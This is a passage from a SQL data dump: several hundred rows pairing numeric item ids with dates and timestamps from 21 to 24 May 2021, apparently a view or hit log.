23:44:45'),(22087,3531,1,'2021-05-21','2021-05-21 23:44:48'),(22088,3034,1,'2021-05-21','2021-05-21 23:45:23'),(22089,3127,1,'2021-05-21','2021-05-21 23:54:45'),(22090,3030,1,'2021-05-21','2021-05-21 23:54:48'),(22091,1598,1,'2021-05-21','2021-05-21 23:55:36'),(22092,3034,1,'2021-05-21','2021-05-21 23:56:54'),(22093,3069,1,'2021-05-22','2021-05-22 00:05:01'),(22094,2809,1,'2021-05-22','2021-05-22 00:05:04'),(22095,3030,1,'2021-05-22','2021-05-22 00:15:09'),(22096,2609,1,'2021-05-22','2021-05-22 00:15:25'),(22097,1604,1,'2021-05-22','2021-05-22 00:18:07'),(22098,2178,1,'2021-05-22','2021-05-22 00:25:10'),(22099,2751,1,'2021-05-22','2021-05-22 00:27:56'),(22100,3498,1,'2021-05-22','2021-05-22 00:34:57'),(22101,76,1,'2021-05-22','2021-05-22 00:38:05'),(22102,2457,1,'2021-05-22','2021-05-22 00:39:13'),(22103,68,1,'2021-05-22','2021-05-22 00:39:49'),(22104,68,1,'2021-05-22','2021-05-22 00:42:10'),(22105,84,1,'2021-05-22','2021-05-22 00:42:24'),(22106,76,1,'2021-05-22','2021-05-22 00:42:39'),(22107,2457,1,'2021-05-22','2021-05-22 00:43:22'),(22108,3541,1,'2021-05-22','2021-05-22 00:44:54'),(22109,470,1,'2021-05-22','2021-05-22 00:44:59'),(22110,1592,1,'2021-05-22','2021-05-22 00:54:59'),(22111,3313,1,'2021-05-22','2021-05-22 00:55:00'),(22112,1600,1,'2021-05-22','2021-05-22 00:58:27'),(22113,3259,1,'2021-05-22','2021-05-22 01:05:08'),(22114,1594,1,'2021-05-22','2021-05-22 01:16:11'),(22115,1612,1,'2021-05-22','2021-05-22 01:25:08'),(22116,1596,1,'2021-05-22','2021-05-22 01:25:19'),(22117,3251,1,'2021-05-22','2021-05-22 01:32:45'),(22118,570,1,'2021-05-22','2021-05-22 01:45:28'),(22119,89,1,'2021-05-22','2021-05-22 01:45:35'),(22120,68,1,'2021-05-22','2021-05-22 01:56:39'),(22121,3704,1,'2021-05-22','2021-05-22 02:00:19'),(22122,2991,1,'2021-05-22','2021-05-22 02:00:33'),(22123,2804,1,'2021-05-22','2021-05-22 02:05:34'),(22124,3704,1,'2021-05-22','2021-05-22 02:05:44'),(22125,3083,1,'2021-05-22','2021-05-22 02:09:43'),(22126,84,1,'2021-05-22','2021-05-22 02:15:42'),(22127,1870,1,'2021-05-22','2021-05-22 02:25:45'),(22128,1614,1,'2021-05-22','2021-05-22 02:25:54'),(22129,2775,1,'2021-05-22','2021-05-22 02:30:06'),(22130,2297,1,'2021-05-22','2021-05-22 02:35:39'),(22131,2704,1,'2021-05-22','2021-05-22 02:35:45'),(22132,335,1,'2021-05-22','2021-05-22 02:45:47'),(22133,3534,1,'2021-05-22','2021-05-22 02:55:26'),(22134,1588,1,'2021-05-22','2021-05-22 02:55:50'),(22135,1726,1,'2021-05-22','2021-05-22 02:57:15'),(22136,2769,1,'2021-05-22','2021-05-22 02:58:14'),(22137,3005,1,'2021-05-22','2021-05-22 03:05:31'),(22138,3257,1,'2021-05-22','2021-05-22 03:06:30'),(22139,2911,1,'2021-05-22','2021-05-22 03:08:20'),(22140,1606,1,'2021-05-22','2021-05-22 03:15:37'),(22141,3479,1,'2021-05-22','2021-05-22 03:15:40'),(22142,3109,1,'2021-05-22','2021-05-22 03:19:56'),(22143,3063,1,'2021-05-22','2021-05-22 03:25:51'),(22144,2558,1,'2021-05-22','2021-05-22 03:28:40'),(22145,76,1,'2021-05-22','2021-05-22 03:36:08'),(22146,482,1,'2021-05-22','2021-05-22 03:36:09'),(22147,2419,1,'2021-05-22','2021-05-22 03:46:06'),(22148,3290,1,'2021-05-22','2021-05-22 03:49:55'),(22149,472,1,'2021-05-22','2021-05-22 03:56:08'),(22150,3099,1,'2021-05-22','2021-05-22 03:56:39'),(22151,2159,1,'2021-05-22','2021-05-22 03:57:10'),(22152,1612,1,'2021-05-22','2021-05-22 04:06:12'),(22153,1711,1,'2021-05-22','2021-05-22 04:06:18'),(22154,2813,1,'2021-05-22','2021-05-22 04:08:03'),(22155,3045,1,'2021-05-22','2021-05-22 04:16:07'),(22156,3253,1,'2021-05-22','2021-05-22 04:16:10'),(22157,2617,1,'2021-05-22','2021-05-22 04:18:12'),(22158,3099,1,'2021-05-22','2021-05-22 04:20:22'),(22159,2395,1,'2021-05-22','2021-05-22 04:26:31'),(22160,3486,1,'2021-05-22','2021-05-22 04:26:33'),(22161,1588,1,'2021-05-22','2021-05-22 04:34:10'),(22162,76,1,'2021-05-22','2021-05-22 04:36:47'),(22163,80,1,'2021-05-22','2021-05-22 04:37:17'),(22164,80,1,'2021-05-22','2021-05-22 04:38:15'),(22165,76,1,'2021-05-22','2021-05-22 04:38:20'),(22166,1588,1,'2021-05-22','2021-05-22 04:38:27'),(22167,3058,1,'2021-05-22','2021-05-22 04:46:26'),(22168,2309,1,'2021-05-22','2021-05-22 04:46:29'),(22169,2704,1,'2021-05-22','2021-05-22 04:48:34'),(22170,2309,1,'2021-05-22','2021-05-22 04:50:43'),(22171,2609,1,'2021-05-22','2021-05-22 04:56:14'),(22172,2420,1,'2021-05-22','2021-05-22 04:59:08'),(22173,3489,1,'2021-05-22','2021-05-22 05:08:26'),(22174,1606,1,'2021-05-22','2021-05-22 05:10:22'),(22175,1770,1,'2021-05-22','2021-05-22 05:10:30'),(22176,1774,1,'2021-05-22','2021-05-22 05:16:26'),(22177,3107,1,'2021-05-22','2021-05-22 05:19:21'),(22178,3585,1,'2021-05-22','2021-05-22 05:26:36'),(22179,3486,1,'2021-05-22','2021-05-22 05:26:42'),(22180,472,1,'2021-05-22','2021-05-22 05:37:12'),(22181,80,1,'2021-05-22','2021-05-22 05:39:47'),(22182,3045,1,'2021-05-22','2021-05-22 05:47:05'),(22183,1602,1,'2021-05-22','2021-05-22 05:56:56'),(22184,1586,1,'2021-05-22','2021-05-22 05:56:57'),(22185,2809,1,'2021-05-22','2021-05-22 06:06:54'),(22186,80,1,'2021-05-22','2021-05-22 06:09:22'),(22187,1596,1,'2021-05-22','2021-05-22 06:11:25'),(22188,1606,1,'2021-05-22','2021-05-22 06:17:06'),(22189,3273,1,'2021-05-22','2021-05-22 06:17:19'),(22190,3104,1,'2021-05-22','2021-05-22 06:30:18'),(22191,3479,1,'2021-05-22','2021-05-22 06:40:24'),(22192,3269,1,'2021-05-22','2021-05-22 06:47:36'),(22193,1582,1,'2021-05-22','2021-05-22 06:47:51'),(22194,3313,1,'2021-05-22','2021-05-22 06:50:25'),(22195,1544,1,'2021-05-22','2021-05-22 06:57:39'),(22196,1600,1,'2021-05-22','2021-05-22 06:57:45'),(22197,1600,1,'2021-05-22','2021-05-22 07:01:26'),(22198,1602,1,'2021-05-22','2021-05-22 07:02:08'),(22199,1718,1,'2021-05-22','2021-05-22 07:07:35'),(22200,1590,1,'2021-05-22','2021-05-22 07:17:30'),(22201,1749,1,'2021-05-22','2021-05-22 07:17:36'),(22202,3247,1,'2021-05-22','2021-05-22 07:27:35'),(22203,3247,1,'2021-05-22','2021-05-22 07:37:39'),(22204,473,1,'2021-05-22','2021-05-22 07:37:42'),(22205,68,1,'2021-05-22','2021-05-22 07:40:28'),(22206,1602,1,'2021-05-22','2021-05-22 07:47:32'),(22207,1598,1,'2021-05-22','2021-05-22 07:50:17'),(22208,1600,1,'2021-05-22','2021-05-22 07:51:26'),(22209,1600,1,'2021-05-22','2021-05-22 07:51:39'),(22210,1600,1,'2021-05-22','2021-05-22 07:52:15'),(22211,1600,1,'2021-05-22','2021-05-22 07:52:58'),(22212,1604,1,'2021-05-22','2021-05-22 08:00:24'),(22213,1770,1,'2021-05-22','2021-05-22 08:01:13'),(22214,76,1,'2021-05-22','2021-05-22 08:06:17'),(22215,1598,1,'2021-05-22','2021-05-22 08:07:25'),(22216,1594,1,'2021-05-22','2021-05-22 08:07:32'),(22217,570,1,'2021-05-22','2021-05-22 08:10:15'),(22218,1588,1,'2021-05-22','2021-05-22 08:17:36'),(22219,1718,1,'2021-05-22','2021-05-22 08:17:42'),(22220,3307,1,'2021-05-22','2021-05-22 08:24:39'),(22221,91,1,'2021-05-22','2021-05-22 08:29:24'),(22222,1766,1,'2021-05-22','2021-05-22 08:29:45'),(22223,3243,1,'2021-05-22','2021-05-22 08:31:51'),(22224,3430,1,'2021-05-22','2021-05-22 08:37:58'),(22225,3104,1,'2021-05-22','2021-05-22 08:48:10'),(22226,1544,1,'2021-05-22','2021-05-22 08:48:13'),(22227,1614,1,'2021-05-22','2021-05-22 08:50:55'),(22228,68,1,'2021-05-22','2021-05-22 08:56:14'),(22229,1586,1,'2021-05-22','2021-05-22 08:57:57'),(22230,2154,1,'2021-05-22','2021-05-22 08:58:36'),(22231,2809,1,'2021-05-22','2021-05-22 09:02:12'),(22232,3691,1,'2021-05-22','2021-05-22 09:07:55'),(22233,2609,1,'2021-05-22','2021-05-22 09:20:47'),(22234,1592,1,'2021-05-22','2021-05-22 09:33:07'),(22235,3127,1,'2021-05-22','2021-05-22 09:33:08'),(22236,3313,1,'2021-05-22','2021-05-22 09:33:10'),(22237,470,1,'2021-05-22','2021-05-22 09:36:02'),(22238,2751,1,'2021-05-22','2021-05-22 09:36:07'),(22239,1602,1,'2021-05-22','2021-05-22 09:41:01'),(22240,3710,1,'2021-05-22','2021-05-22 09:46:13'),(22241,3226,1,'2021-05-22','2021-05-22 09:56:09'),(22242,2410,1,'2021-05-22','2021-05-22 09:56:16'),(22243,2297,1,'2021-05-22','2021-05-22 10:05:57'),(22244,1728,1,'2021-05-22','2021-05-22 10:08:45'),(22245,3498,1,'2021-05-22','2021-05-22 10:15:59'),(22246,481,1,'2021-05-22','2021-05-22 10:16:12'),(22247,3541,1,'2021-05-22','2021-05-22 10:26:19'),(22248,468,1,'2021-05-22','2021-05-22 10:28:15'),(22249,2159,1,'2021-05-22','2021-05-22 10:31:37'),(22250,468,1,'2021-05-22','2021-05-22 10:36:17'),(22251,2617,1,'2021-05-22','2021-05-22 10:36:20'),(22252,3307,1,'2021-05-22','2021-05-22 10:46:28'),(22253,2775,1,'2021-05-22','2021-05-22 11:06:46'),(22254,1614,1,'2021-05-22','2021-05-22 11:09:08'),(22255,2804,1,'2021-05-22','2021-05-22 11:11:14'),(22256,84,1,'2021-05-22','2021-05-22 11:16:52'),(22257,3034,1,'2021-05-22','2021-05-22 11:19:44'),(22258,3674,1,'2021-05-22','2021-05-22 11:29:36'),(22259,484,1,'2021-05-22','2021-05-22 11:36:49'),(22260,1602,1,'2021-05-22','2021-05-22 11:37:26'),(22261,3053,1,'2021-05-22','2021-05-22 11:46:50'),(22262,1588,1,'2021-05-22','2021-05-22 11:49:03'),(22263,2704,1,'2021-05-22','2021-05-22 11:59:44'),(22264,477,1,'2021-05-22','2021-05-22 12:07:09'),(22265,2769,1,'2021-05-22','2021-05-22 12:07:13'),(22266,2911,1,'2021-05-22','2021-05-22 12:17:12'),(22267,3680,1,'2021-05-22','2021-05-22 12:27:17'),(22268,1774,1,'2021-05-22','2021-05-22 12:43:52'),(22269,3097,1,'2021-05-22','2021-05-22 12:47:27'),(22270,2419,1,'2021-05-22','2021-05-22 12:47:30'),(22271,3030,1,'2021-05-22','2021-05-22 12:57:38'),(22272,2813,1,'2021-05-22','2021-05-22 12:57:41'),(22273,1602,1,'2021-05-22','2021-05-22 12:59:02'),(22274,472,1,'2021-05-22','2021-05-22 12:59:42'),(22275,2395,1,'2021-05-22','2021-05-22 13:01:51'),(22276,2457,1,'2021-05-22','2021-05-22 13:02:03'),(22277,1612,1,'2021-05-22','2021-05-22 13:07:42'),(22278,2617,1,'2021-05-22','2021-05-22 13:07:49'),(22279,76,1,'2021-05-22','2021-05-22 13:09:13'),(22280,3691,1,'2021-05-22','2021-05-22 13:27:57'),(22281,3127,1,'2021-05-22','2021-05-22 13:30:37'),(22282,1726,1,'2021-05-22','2021-05-22 13:32:42'),(22283,476,1,'2021-05-22','2021-05-22 13:38:02'),(22284,2775,1,'2021-05-22','2021-05-22 13:47:44'),(22285,1598,1,'2021-05-22','2021-05-22 13:48:43'),(22286,3083,1,'2021-05-22','2021-05-22 13:50:26'),(22287,2309,1,'2021-05-22','2021-05-22 13:57:44'),(22288,2309,1,'2021-05-22','2021-05-22 13:57:57'),(22289,3486,1,'2021-05-22','2021-05-22 14:00:35'),(22290,2159,1,'2021-05-22','2021-05-22 14:02:39'),(22291,2609,1,'2021-05-22','2021-05-22 14:07:45'),(22292,469,1,'2021-05-22','2021-05-22 14:10:38'),(22293,1596,1,'2021-05-22','2021-05-22 14:14:43'),(22294,2704,1,'2021-05-22','2021-05-22 14:17:41'),(22295,1774,1,'2021-05-22','2021-05-22 14:17:43'),(22296,1770,1,'2021-05-22','2021-05-22 14:20:23'),(22297,2297,1,'2021-05-22','2021-05-22 14:21:25'),(22298,3489,1,'2021-05-22','2021-05-22 14:27:46'),(22299,1592,1,'2021-05-22','2021-05-22 14:27:52'),(22300,3175,1,'2021-05-22','2021-05-22 14:30:32'),(22301,478,1,'2021-05-22','2021-05-22 14:32:40'),(22302,3664,1,'2021-05-22','2021-05-22 14:32:41'),(22303,3243,1,'2021-05-22','2021-05-22 14:38:00'),(22304,3175,1,'2021-05-22','2021-05-22 14:38:15'),(22305,2751,1,'2021-05-22','2021-05-22 14:40:43'),(22306,2490,1,'2021-05-22','2021-05-22 14:48:13'),(22307,3489,1,'2021-05-22','2021-05-22 14:48:19'),(22308,1586,1,'2021-05-22','2021-05-22 14:58:20'),(22309,1707,1,'2021-05-22','2021-05-22 15:08:27'),(22310,1602,1,'2021-05-22','2021-05-22 15:08:35'),(22311,80,1,'2021-05-22','2021-05-22 15:11:14'),(22312,3267,1,'2021-05-22','2021-05-22 15:18:37'),(22313,472,1,'2021-05-22','2021-05-22 15:21:25'),(22314,1606,1,'2021-05-22','2021-05-22 15:28:41'),(22315,2809,1,'2021-05-22','2021-05-22 15:28:44'),(22316,3045,1,'2021-05-22','2021-05-22 15:31:27'),(22317,486,1,'2021-05-22','2021-05-22 15:32:37'),(22318,1602,1,'2021-05-22','2021-05-22 15:33:23'),(22319,1606,1,'2021-05-22','2021-05-22 15:39:06'),(22320,1596,1,'2021-05-22','2021-05-22 15:39:09'),(22321,80,1,'2021-05-22','2021-05-22 15:41:45'),(22322,2420,1,'2021-05-22','2021-05-22 15:49:04'),(22323,1600,1,'2021-05-22','2021-05-22 15:58:40'),(22324,2150,1,'2021-05-22','2021-05-22 16:02:39'),(22325,3247,1,'2021-05-22','2021-05-22 16:09:03'),(22326,1870,1,'2021-05-22','2021-05-22 16:09:07'),(22327,1582,1,'2021-05-22','2021-05-22 16:10:53'),(22328,1602,1,'2021-05-22','2021-05-22 16:11:23'),(22329,3247,1,'2021-05-22','2021-05-22 16:13:08'),(22330,1602,1,'2021-05-22','2021-05-22 16:13:55'),(22331,1602,1,'2021-05-22','2021-05-22 16:14:18'),(22332,1728,1,'2021-05-22','2021-05-22 16:14:57'),(22333,80,1,'2021-05-22','2021-05-22 16:15:04'),(22334,1718,1,'2021-05-22','2021-05-22 16:19:03'),(22335,1590,1,'2021-05-22','2021-05-22 16:28:44'),(22336,1877,1,'2021-05-22','2021-05-22 16:31:38'),(22337,3060,1,'2021-05-22','2021-05-22 16:41:45'),(22338,1749,1,'2021-05-22','2021-05-22 16:48:58'),(22339,1544,1,'2021-05-22','2021-05-22 16:49:01'),(22340,3257,1,'2021-05-22','2021-05-22 16:49:04'),(22341,1594,1,'2021-05-22','2021-05-22 16:59:11'),(22342,486,1,'2021-05-22','2021-05-22 17:00:17'),(22343,570,1,'2021-05-22','2021-05-22 17:01:55'),(22344,1588,1,'2021-05-22','2021-05-22 17:09:19'),(22345,2769,1,'2021-05-22','2021-05-22 17:09:29'),(22346,1586,1,'2021-05-22','2021-05-22 17:17:01'),(22347,1598,1,'2021-05-22','2021-05-22 17:19:17'),(22348,1604,1,'2021-05-22','2021-05-22 17:19:43'),(22349,1718,1,'2021-05-22','2021-05-22 17:22:05'),(22350,3531,1,'2021-05-22','2021-05-22 17:29:41'),(22351,3307,1,'2021-05-22','2021-05-22 17:31:44'),(22352,91,1,'2021-05-22','2021-05-22 17:33:59'),(22353,1544,1,'2021-05-22','2021-05-22 17:39:45'),(22354,1604,1,'2021-05-22','2021-05-22 17:39:46'),(22355,1766,1,'2021-05-22','2021-05-22 17:43:06'),(22356,3290,1,'2021-05-22','2021-05-22 17:44:55'),(22357,3104,1,'2021-05-22','2021-05-22 17:49:45'),(22358,1614,1,'2021-05-22','2021-05-22 17:49:57'),(22359,3498,1,'2021-05-22','2021-05-22 17:52:34'),(22360,2809,1,'2021-05-22','2021-05-22 17:59:35'),(22361,108,1,'2021-05-22','2021-05-22 17:59:37'),(22362,3430,1,'2021-05-22','2021-05-22 18:01:41'),(22363,1586,1,'2021-05-22','2021-05-22 18:03:50'),(22364,3691,1,'2021-05-22','2021-05-22 18:09:46'),(22365,1600,1,'2021-05-22','2021-05-22 18:09:55'),(22366,1600,1,'2021-05-22','2021-05-22 18:09:59'),(22367,1600,1,'2021-05-22','2021-05-22 18:11:38'),(22368,3534,1,'2021-05-22','2021-05-22 18:22:25'),(22369,3534,1,'2021-05-22','2021-05-22 19:18:52'),(22370,3316,1,'2021-05-22','2021-05-22 19:19:59'),(22371,467,1,'2021-05-22','2021-05-22 19:32:16'),(22372,3282,1,'2021-05-22','2021-05-22 20:20:58'),(22373,2503,1,'2021-05-22','2021-05-22 20:29:56'),(22374,1586,1,'2021-05-22','2021-05-22 20:49:27'),(22375,1586,1,'2021-05-22','2021-05-22 20:49:28'),(22376,1586,1,'2021-05-22','2021-05-22 20:49:38'),(22377,1586,1,'2021-05-22','2021-05-22 20:52:07'),(22378,1586,1,'2021-05-22','2021-05-22 20:52:30'),(22379,1707,1,'2021-05-22','2021-05-22 20:53:44'),(22380,1707,1,'2021-05-22','2021-05-22 20:53:44'),(22381,1699,1,'2021-05-22','2021-05-22 20:55:22'),(22382,1699,1,'2021-05-22','2021-05-22 20:55:23'),(22383,1707,1,'2021-05-22','2021-05-22 20:56:19'),(22384,1586,1,'2021-05-22','2021-05-22 20:57:00'),(22385,91,1,'2021-05-22','2021-05-22 21:20:18'),(22386,1602,1,'2021-05-22','2021-05-22 21:35:56'),(22387,1602,1,'2021-05-22','2021-05-22 21:49:47'),(22388,1602,1,'2021-05-22','2021-05-22 21:49:48'),(22389,1582,1,'2021-05-22','2021-05-22 21:56:25'),(22390,1602,1,'2021-05-22','2021-05-22 22:00:07'),(22391,1586,1,'2021-05-22','2021-05-22 22:01:25'),(22392,2704,1,'2021-05-22','2021-05-22 23:41:45'),(22393,3267,1,'2021-05-22','2021-05-22 23:50:56'),(22394,3664,1,'2021-05-23','2021-05-23 00:13:22'),(22395,1598,1,'2021-05-23','2021-05-23 00:16:56'),(22396,1600,1,'2021-05-23','2021-05-23 00:30:26'),(22397,3006,1,'2021-05-23','2021-05-23 00:31:08'),(22398,2159,1,'2021-05-23','2021-05-23 00:43:21'),(22399,486,1,'2021-05-23','2021-05-23 01:15:18'),(22400,2904,1,'2021-05-23','2021-05-23 02:04:16'),(22401,1594,1,'2021-05-23','2021-05-23 02:11:42'),(22402,1594,1,'2021-05-23','2021-05-23 02:12:05'),(22403,1594,1,'2021-05-23','2021-05-23 02:13:43'),(22404,1594,1,'2021-05-23','2021-05-23 02:14:38'),(22405,3267,1,'2021-05-23','2021-05-23 02:32:05'),(22406,84,1,'2021-05-23','2021-05-23 02:58:42'),(22407,87,1,'2021-05-23','2021-05-23 03:22:09'),(22408,2148,1,'2021-05-23','2021-05-23 03:24:07'),(22409,478,1,'2021-05-23','2021-05-23 04:03:49'),(22410,3531,1,'2021-05-23','2021-05-23 04:33:44'),(22411,478,1,'2021-05-23','2021-05-23 04:33:47'),(22412,1600,1,'2021-05-23','2021-05-23 05:09:50'),(22413,1745,1,'2021-05-23','2021-05-23 05:10:23'),(22414,1600,1,'2021-05-23','2021-05-23 05:10:47'),(22415,1600,1,'2021-05-23','2021-05-23 05:21:30'),(22416,1614,1,'2021-05-23','2021-05-23 05:26:12'),(22417,3038,1,'2021-05-23','2021-05-23 05:32:14'),(22418,1594,1,'2021-05-23','2021-05-23 06:30:54'),(22419,1720,1,'2021-05-23','2021-05-23 06:41:21'),(22420,80,1,'2021-05-23','2021-05-23 09:26:24'),(22421,80,1,'2021-05-23','2021-05-23 09:31:48'),(22422,3083,1,'2021-05-23','2021-05-23 10:17:40'),(22423,3083,1,'2021-05-23','2021-05-23 10:18:07'),(22424,3038,1,'2021-05-23','2021-05-23 10:21:18'),(22425,2159,1,'2021-05-23','2021-05-23 10:25:05'),(22426,2159,1,'2021-05-23','2021-05-23 10:30:33'),(22427,2159,1,'2021-05-23','2021-05-23 10:53:16'),(22428,1600,1,'2021-05-23','2021-05-23 11:39:06'),(22429,1600,1,'2021-05-23','2021-05-23 11:48:29'),(22430,1747,1,'2021-05-23','2021-05-23 11:50:01'),(22431,68,1,'2021-05-23','2021-05-23 12:46:36'),(22432,3267,1,'2021-05-23','2021-05-23 13:21:59'),(22433,80,1,'2021-05-23','2021-05-23 13:51:27'),(22434,570,1,'2021-05-23','2021-05-23 13:58:53'),(22435,1606,1,'2021-05-23','2021-05-23 14:24:52'),(22436,3531,1,'2021-05-23','2021-05-23 14:42:49'),(22437,1602,1,'2021-05-23','2021-05-23 14:59:37'),(22438,1608,1,'2021-05-23','2021-05-23 15:00:00'),(22439,1602,1,'2021-05-23','2021-05-23 15:00:19'),(22440,1588,1,'2021-05-23','2021-05-23 15:51:00'),(22441,1602,1,'2021-05-23','2021-05-23 15:57:22'),(22442,1598,1,'2021-05-23','2021-05-23 16:02:33'),(22443,1608,1,'2021-05-23','2021-05-23 16:37:35'),(22444,1602,1,'2021-05-23','2021-05-23 17:03:24'),(22445,1602,1,'2021-05-23','2021-05-23 17:03:46'),(22446,68,1,'2021-05-23','2021-05-23 17:05:28'),(22447,80,1,'2021-05-23','2021-05-23 17:06:41'),(22448,72,1,'2021-05-23','2021-05-23 17:09:59'),(22449,76,1,'2021-05-23','2021-05-23 17:18:12'),(22450,1594,1,'2021-05-23','2021-05-23 17:51:37'),(22451,1602,1,'2021-05-23','2021-05-23 18:05:06'),(22452,76,1,'2021-05-23','2021-05-23 18:28:10'),(22453,1602,1,'2021-05-23','2021-05-23 18:28:13'),(22454,1720,1,'2021-05-23','2021-05-23 19:04:19'),(22455,1614,1,'2021-05-23','2021-05-23 19:10:01'),(22456,1594,1,'2021-05-23','2021-05-23 19:47:20'),(22457,1594,1,'2021-05-23','2021-05-23 19:49:43'),(22458,91,1,'2021-05-23','2021-05-23 19:56:49'),(22459,1598,1,'2021-05-23','2021-05-23 19:58:18'),(22460,1586,1,'2021-05-23','2021-05-23 20:17:30'),(22461,2989,1,'2021-05-23','2021-05-23 21:10:01'),(22462,2989,1,'2021-05-23','2021-05-23 21:26:11'),(22463,3102,1,'2021-05-23','2021-05-23 21:32:03'),(22464,1707,1,'2021-05-23','2021-05-23 21:54:30'),(22465,1720,1,'2021-05-23','2021-05-23 21:54:32'),(22466,1594,1,'2021-05-23','2021-05-23 22:14:37'),(22467,570,1,'2021-05-23','2021-05-23 22:20:20'),(22468,1602,1,'2021-05-23','2021-05-23 22:25:52'),(22469,1602,1,'2021-05-23','2021-05-23 22:27:58'),(22470,76,1,'2021-05-23','2021-05-23 22:29:17'),(22471,1602,1,'2021-05-23','2021-05-23 23:30:14'),(22472,3531,1,'2021-05-23','2021-05-23 23:35:54'),(22473,467,1,'2021-05-24','2021-05-24 00:06:00'),(22474,486,1,'2021-05-24','2021-05-24 00:20:04'),(22475,486,1,'2021-05-24','2021-05-24 00:36:42'),(22476,1602,1,'2021-05-24','2021-05-24 01:00:19'),(22477,3038,1,'2021-05-24','2021-05-24 01:46:49'),(22478,2297,1,'2021-05-24','2021-05-24 02:29:16'),(22479,2309,1,'2021-05-24','2021-05-24 03:27:57'),(22480,2309,1,'2021-05-24','2021-05-24 03:42:50'),(22481,3267,1,'2021-05-24','2021-05-24 05:27:29'),(22482,467,1,'2021-05-24','2021-05-24 05:47:40'),(22483,2503,1,'2021-05-24','2021-05-24 06:56:14'),(22484,1594,1,'2021-05-24','2021-05-24 06:58:21'),(22485,1594,1,'2021-05-24','2021-05-24 06:58:54'),(22486,1594,1,'2021-05-24','2021-05-24 07:01:20'),(22487,570,1,'2021-05-24','2021-05-24 07:17:19'),(22488,570,1,'2021-05-24','2021-05-24 07:17:29'),(22489,570,1,'2021-05-24','2021-05-24 07:17:39'),(22490,3038,1,'2021-05-24','2021-05-24 07:18:44'),(22491,2503,1,'2021-05-24','2021-05-24 07:25:42'),(22492,1720,1,'2021-05-24','2021-05-24 07:38:14'),(22493,2410,1,'2021-05-24','2021-05-24 07:54:53'),(22494,91,1,'2021-05-24','2021-05-24 07:55:30'),(22495,91,1,'2021-05-24','2021-05-24 07:55:33'),(22496,91,1,'2021-05-24','2021-05-24 07:55:41'),(22497,1586,1,'2021-05-24','2021-05-24 08:06:13'),(22498,1586,1,'2021-05-24','2021-05-24 08:06:15'),(22499,1586,1,'2021-05-24','2021-05-24 08:06:16'),(22500,3109,1,'2021-05-24','2021-05-24 08:15:35'),(22501,1604,1,'2021-05-24','2021-05-24 08:38:52'),(22502,3531,1,'2021-05-24','2021-05-24 08:48:20'),(22503,3486,1,'2021-05-24','2021-05-24 09:24:12'),(22504,1701,1,'2021-05-24','2021-05-24 09:42:27'),(22505,1606,1,'2021-05-24','2021-05-24 09:46:58'),(22506,3267,1,'2021-05-24','2021-05-24 09:48:42'),(22507,84,1,'2021-05-24','2021-05-24 09:49:23'),(22508,91,1,'2021-05-24','2021-05-24 09:52:14'),(22509,91,1,'2021-05-24','2021-05-24 10:13:01'),(22510,3486,1,'2021-05-24','2021-05-24 10:23:04'),(22511,2704,1,'2021-05-24','2021-05-24 10:25:28'),(22512,76,1,'2021-05-24','2021-05-24 10:25:28'),(22513,68,1,'2021-05-24','2021-05-24 10:25:53'),(22514,1734,1,'2021-05-24','2021-05-24 10:27:19'),(22515,1707,1,'2021-05-24','2021-05-24 10:38:49'),(22516,3045,1,'2021-05-24','2021-05-24 10:50:56'),(22517,3027,1,'2021-05-24','2021-05-24 10:50:57'),(22518,2419,1,'2021-05-24','2021-05-24 10:51:17'),(22519,80,1,'2021-05-24','2021-05-24 10:51:18'),(22520,3486,1,'2021-05-24','2021-05-24 11:01:08'),(22521,1608,1,'2021-05-24','2021-05-24 11:05:40'),(22522,473,1,'2021-05-24','2021-05-24 11:13:00'),(22523,1608,1,'2021-05-24','2021-05-24 11:32:06'),(22524,1608,1,'2021-05-24','2021-05-24 11:37:18'),(22525,1608,1,'2021-05-24','2021-05-24 11:41:46'),(22526,1608,1,'2021-05-24','2021-05-24 11:42:03'),(22527,2159,1,'2021-05-24','2021-05-24 12:18:15'),(22528,2159,1,'2021-05-24','2021-05-24 12:18:40'),(22529,1588,1,'2021-05-24','2021-05-24 12:27:00'),(22530,1588,1,'2021-05-24','2021-05-24 12:27:41'),(22531,1606,1,'2021-05-24','2021-05-24 12:44:05'),(22532,1604,1,'2021-05-24','2021-05-24 12:49:02'),(22533,1606,1,'2021-05-24','2021-05-24 12:49:16'),(22534,1598,1,'2021-05-24','2021-05-24 12:58:57'),(22535,1596,1,'2021-05-24','2021-05-24 13:07:48'),(22536,1610,1,'2021-05-24','2021-05-24 13:21:46'),(22537,2159,1,'2021-05-24','2021-05-24 13:29:00'),(22538,2159,1,'2021-05-24','2021-05-24 13:29:00'),(22539,1598,1,'2021-05-24','2021-05-24 14:06:26'),(22540,1594,1,'2021-05-24','2021-05-24 14:37:14'),(22541,1602,1,'2021-05-24','2021-05-24 14:51:18'),(22542,478,1,'2021-05-24','2021-05-24 14:59:01'),(22543,2609,1,'2021-05-24','2021-05-24 15:41:48'),(22544,3030,1,'2021-05-24','2021-05-24 16:01:11'),(22545,3297,1,'2021-05-24','2021-05-24 16:03:52'),(22546,1720,1,'2021-05-24','2021-05-24 16:08:48'),(22547,3267,1,'2021-05-24','2021-05-24 16:39:24'),(22548,471,1,'2021-05-24','2021-05-24 17:59:57'),(22549,2503,1,'2021-05-24','2021-05-24 18:19:54'),(22550,467,1,'2021-05-24','2021-05-24 18:51:42'),(22551,87,1,'2021-05-24','2021-05-24 19:19:28'),(22552,3107,1,'2021-05-24','2021-05-24 19:31:46'),(22553,1602,1,'2021-05-24','2021-05-24 19:32:22'),(22554,3109,1,'2021-05-24','2021-05-24 19:37:21'),(22555,3038,1,'2021-05-24','2021-05-24 19:39:59'),(22556,1600,1,'2021-05-24','2021-05-24 19:40:28'),(22557,1600,1,'2021-05-24','2021-05-24 19:47:13'),(22558,467,1,'2021-05-24','2021-05-24 19:49:59'),(22559,2989,1,'2021-05-24','2021-05-24 19:55:57'),(22560,1588,1,'2021-05-24','2021-05-24 20:18:39'),(22561,2503,1,'2021-05-24','2021-05-24 20:20:17'),(22562,2159,1,'2021-05-24','2021-05-24 20:34:53'),(22563,2159,1,'2021-05-24','2021-05-24 20:34:54'),(22564,1602,1,'2021-05-24','2021-05-24 20:43:49'),(22565,3030,1,'2021-05-24','2021-05-24 20:57:19'),(22566,1600,1,'2021-05-24','2021-05-24 21:42:56'),(22567,1602,1,'2021-05-24','2021-05-24 21:46:21'),(22568,1608,1,'2021-05-24','2021-05-24 22:03:11'),(22569,1594,1,'2021-05-24','2021-05-24 22:18:55'),(22570,1594,1,'2021-05-24','2021-05-24 22:19:01'),(22571,2609,1,'2021-05-24','2021-05-24 22:37:54'),(22572,1766,1,'2021-05-24','2021-05-24 